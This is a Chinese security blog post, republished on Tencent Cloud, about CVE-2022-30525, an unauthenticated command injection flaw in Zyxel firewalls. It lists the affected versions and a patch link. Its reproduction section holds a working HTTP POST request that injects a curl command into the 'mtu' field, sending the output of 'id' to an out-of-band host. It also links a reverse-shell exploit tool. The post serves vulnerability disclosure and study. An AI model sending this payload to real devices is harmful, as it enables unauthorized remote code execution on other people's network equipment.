前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
MCP广场
社区首页 >专栏 >CVE-2022-30525:Zyxel防火墙未授权远程命令执行漏洞

CVE-2022-30525:Zyxel防火墙未授权远程命令执行漏洞

作者头像
Timeline Sec
发布于 2022-10-05 11:53:05
发布于 2022-10-05 11:53:05
2.2K00
代码可运行
举报
文章被收录于专栏:Timeline SecTimeline Sec
运行总次数:0
代码可运行

作者:韭菜@Timeline Sec

本文字数:672

阅读时长:2~3min

声明:仅供学习参考使用,请勿用作违法用途,否则后果自负

0x01 简介

Zyxel VPN防火墙系列提供了一个完整的功能集,可完全符合不同的业务需求,并通过一对一的设备实现最高性能和安全性。; 全面的网络模块化还使IT专业人员能够定制系统以满足其个人需求。

0x02 漏洞概述

漏洞编号:CVE-2022-30525

Rapid7 发现并报告了一个漏洞,该漏洞影响支持零接触配置 (ZTP) 的 Zyxel 防火墙,其中包括 ATP 系列、VPN 系列和 USG FLEX 系列(包括 USG20-VPN 和 USG20W-VPN)。该漏洞标识为 CVE-2022-30525,允许未经身份验证的远程攻击者以nobody受影响设备上的用户身份执行任意代码。

0x03 影响版本

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
USG FLEX 100、100W、200500700 < ZLD5.00 - ZLD5.21 USG20-VPN
USG20-VPNUSG20W-VPN < ZLD5.10 - ZLD5.21 
ATP 100200500700800 < ZLD5.10 - ZLD5.21

0x04 漏洞复现

以USG20 -VPN为例

攻击是通过/ztp/cgi-bin/handler端点发起的,通过mtu参数进行命令执行

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
POST /ztp/cgi-bin/handler HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Type: application/json
Accept-Encoding: gzip

{"command":"setWanPortSt","proto":"dhcp","port":"4","vlan_tagged":"1","vlanid":"5","mtu":"; curl `id`.cbc2oelmk1u41mao0f10zeoez9n56xp8c.oast.live;","data":"hi"}

0x05 修复方式

当前官方已发布最新版本,建议受影响的用户及时更新升级到最新版本。

链接如下:

https://www.zyxel.com/support/Zyxel-security-advisory-for-OS-command-injection-vulnerability-of-firewalls.shtml

参考链接/相关工具:

https://github.com/Chocapikk/CVE-2022-30525-Reverse-Shell

https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2022/CVE-2022-30525.yaml

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2022-07-21,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 Timeline Sec 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
暂无评论
推荐阅读
编辑精选文章
换一批
多个Zyxel防火墙、VPN产品中发现秘密后门账户
Zyxel发布了一个补丁,以解决其固件中的一个关键漏洞,涉及一个未记录的硬编码秘密账户,可被攻击者滥用管理权限登录并控制其网络设备。
Khan安全团队
2021/01/11
8320
多个Zyxel防火墙、VPN产品中发现秘密后门账户
2022 年全球网络安全漏洞 TOP 10 | FreeBuf 年度盘点
CNVD 公开数据显示,2022 年共披露安全漏洞23900+枚,其中低风险漏洞占比11.13%,中高风险漏洞占比较约53.82%,高危漏洞占比35.05%。从数据可以看出,中高危漏洞占比近89%,如此风险程度的漏洞一旦被潜在网络犯罪分子利用,会给企业组织带来毁灭性打击。
FB客服
2023/02/10
1.5K0
2022 年全球网络安全漏洞 TOP 10 | FreeBuf 年度盘点
CVE-2022-1388:F5 BIG-IP身份验证绕过RCE
F5 BIG-IP是美国F5公司的一款集成了网络流量管理、应用程序安全管理、负载均衡等功能的应用交付平台。
Timeline Sec
2022/10/05
2.2K0
CVE-2022-1388:F5 BIG-IP身份验证绕过RCE
CVE-2024-36401:GeoServer未授权RCE漏洞
GeoServer 是一个开源的地理信息服务器,用于发布和共享地理空间数据。它是由 GeoTools 库驱动的,GeoTools 是一个用于处理地理数据的 Java 库。GeoServer 允许用户从各种数据源(如 Shapefile、PostGIS、Oracle Spatial、ArcSDE 等)发布地理空间数据,并通过标准的 OGC(Open Geospatial Consortium)协议(如 WMS、WFS、WCS 等)进行访问。
Timeline Sec
2024/11/23
1.4K0
CVE-2024-36401:GeoServer未授权RCE漏洞
CVE-2024-29269|Telesquare TLR-2005KSH路由器未授权远程命令执行漏洞(EXP)
Telesquare TLR-2005KSH是韩国Telesquare公司的一款SK电讯Lte路由器。
信安百科
2024/04/15
5620
CVE-2024-29269|Telesquare TLR-2005KSH路由器未授权远程命令执行漏洞(EXP)
【安全公告】PHP 远程代码执行漏洞(CVE-2022-31626)风险通告
6月初,PHP 官方发布了多个远程代码执行漏洞安全公告,披露了PHP 远程代码执行漏洞(CVE-2022-31626),由于PHP未检查复制的数据长度和缓冲区长度,导致堆溢出,可能导致远程代码执行。
腾讯云安全中心
2022/06/27
5.5K0
CVE-2024-36401|GeoServer 未授权远程代码执行漏洞(POC)
GeoServer是基于Java 的软件服务器,允许用户查看和编辑地理空间数据。使用开放地理空间联盟(OGC)提出的开放标准,GeoServer在地图创建和数据共享方面具有极大的灵活性。
信安百科
2024/07/12
1.2K0
CVE-2024-36401|GeoServer 未授权远程代码执行漏洞(POC)
Windows HTTP协议栈远程代码漏洞执行CVE-2022-21907
https://github.com/antx-code/CVE-2022-21907
Khan安全团队
2022/01/18
8800
CVE-2022-22947:Spring Cloud Gateway远程代码执行漏洞
Spring Cloud是一系列框架的有序集合。它利用Spring Boot的开发便利性巧妙地简化了分布式系统基础设施的开发,如服务发现注册、配置中心、消息总线、负载均衡、断路器、数据监控等,都可以用Spring Boot的开发风格做到一键启动和部署。
Timeline Sec
2022/10/05
2.6K0
CVE-2022-22947:Spring Cloud Gateway远程代码执行漏洞
HTTP协议栈远程代码执行漏洞(CVE-2022-21907)复现
HTTP协议堆栈中存在远程代码执行漏洞,由于HTTP协议栈(HTTP.sys)中的HTTP Trailer Support功能存在边界错误可导致缓冲区溢出。
洛米唯熊
2022/01/23
2.3K0
rootNUUO NVRmini2(2022 版)中未经身份验证的远程代码执行
NUUO 的NVRmini2是由NUUO Inc.生产的网络视频录像机 (NVR)。 与大多数 NVR 一样,它的安全性很差,并且曾多次被黑客入侵,这是我在 2016 年首次使用命令注入和堆栈溢出攻击。
Khan安全团队
2022/01/19
1.5K0
Weblogic未授权远程命令执行漏洞(CVE-2020-14882&CVE-2020-14883)复现
Weblogic是Oracle公司推出的J2EE应用服务器,CVE-2020-14882允许未授权的用户绕过管理控制台的权限验证访问后台,CVE-2020-14883允许后台任意用户通过HTTP协议执行任意命令。使用这两个漏洞组成的利用链,可通过一个GET请求在远程Weblogic服务器上以未授权的任意用户身份执行命令。
用户8478399
2022/09/22
4950
Weblogic未授权远程命令执行漏洞(CVE-2020-14882&CVE-2020-14883)复现
漏洞分析|SaltStack未授权访问及命令执行漏洞分析(CVE-2020-16846/25592)
一、背景 漏洞概述: SaltStack是一个分布式运维系统,在互联网场景中被广泛应用,有以下两个主要功能:   •     配置管理系统,能够将远程节点维护在一个预定义的状态(例如,确保安装特定的软件包并运行特定的服务)   •     分布式远程执行系统,用于在远程节点上单独或通过任意选择标准来执行命令和查询数据 2020年11月4日,SaltStack 官方发布了一则安全更新公告,其中CVE-2020-16846和CVE-2020-25592组合使用可在未授权的情况下通过salt-api接口执行任意
云鼎实验室
2020/11/13
1.1K0
Apache log4j2 远程命令执行漏洞复现
Apache log4j2 RCE漏洞(CVE-2021-44228)一出,各大行业知名厂商纷纷中招,与之前的fastjson、shiro漏洞相比更为严重,预计在之后的三四年中漏洞会一直存在。此漏洞影响范围特别广泛,漏洞利用门槛低,危害程度非常大,如果被攻击者恶意利用,危害程度不亚于2017年爆发的“永恒之蓝”漏洞。以下图片来源于网络
LuckySec
2022/11/02
4.8K0
Apache log4j2 远程命令执行漏洞复现
2020护网期间公布漏洞总结-附部分漏洞Poc,Exp
4.Apache DolphinScheduler远程代码执行漏洞(CVE-2020-11974),危害级别:危急,官方已发布补丁
Gamma实验室
2020/12/23
6.5K0
2020护网期间公布漏洞总结-附部分漏洞Poc,Exp
CVE-2021-20038
2021 年 12 月 7 日,SonicWall 为其安全移动访问 (SMA) 100 系列发布了新固件。SonicWall 于 2022 年 1 月 11 日发布安全公告,通知用户 12 月发布了 Rapid7 发现的已修复安全问题。最关键的问题是 Web 界面中未经身份验证的基于堆栈的缓冲区溢出,允许远程攻击者以nobody用户身份执行任意代码。该漏洞的编号为 CVE-2021-20038,CVSS 评分为9.8。
Khan安全团队
2022/01/13
1.4K0
Electron 安全与你我息息相关
它的应用面如此之广,以至于我们很难忽略它的存在。这篇文章的目的在于介绍当前 Electron 安全发展态势,更关键的是,最近 XZ 后门事件直接导致了供应链安全的担忧,虽然很多应用程序并不一定开源,但是这篇文章会给大家介绍一些通用的切实可行的检测措施,找出 Electron 程序可能存在的 XSS To RCE 和有危害的供应链威胁
意大利的猫
2024/04/15
2.1K0
Electron 安全与你我息息相关
Spring Framework远程代码执行漏洞复现(CVE-2022-22965)
Spring Framework是一个开源应用框架,初衷是为了降低应用程序开发的复杂度,具有分层体系结构,允许用户选择组件,同时还为 J2EE 应用程序开发提供了一个好用的框架。当Spring部署在JDK9及以上版本,远程攻击者可利用该漏洞写入恶意代码导致远程代码执行。 Spring Framework存在远程代码执行漏洞,在 JDK 9 及以上版本环境下,远程攻击者可利用该漏洞写入恶意代码导致远程代码执行漏洞。
R0A1NG
2022/05/03
3.1K0
Spring Framework远程代码执行漏洞复现(CVE-2022-22965)
腾讯主机安全捕获YAPI远程代码执行0day漏洞在野利用,该攻击正扩散,可使用防火墙阻截
腾讯主机安全(云镜)捕获YAPI远程代码执行0day漏洞在野利用,该攻击正在扩散。受YAPI远程代码执行0day漏洞影响,从7月第1周开始,未部署任何安全防护系统的失陷云主机数已达数千台。先后出现两次失陷高峰,一次在7月3号,一次在7月7号。BillGates僵尸网络在7月1日首先发起攻击,7月4日Mirai僵尸网络木马攻击的规模更大,已部署腾讯云防火墙(链接)的云主机成功防御此轮攻击。
腾讯安全
2021/07/08
4.7K7
腾讯主机安全捕获YAPI远程代码执行0day漏洞在野利用,该攻击正扩散,可使用防火墙阻截
原创Paper | Citrix CVE-2022-27518 漏洞分析
Citrix在2022年12月份发布了CVSS评分9.8的CVE-2022-27518远程代码执行漏洞通告,距今已经过去两个多月了,由于漏洞环境搭建较为复杂,一直没有相关的分析文章。经过一段时间的diff分析及验证后,发现漏洞成因在于Citrix netscaler在解析SAML xml时对SignatureValue字段校验不严格导致了栈溢出。
Seebug漏洞平台
2023/08/23
1K0
原创Paper | Citrix CVE-2022-27518 漏洞分析
推荐阅读
相关推荐
多个Zyxel防火墙、VPN产品中发现秘密后门账户
更多 >
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档
本文部分代码块支持一键运行,欢迎体验
本文部分代码块支持一键运行,欢迎体验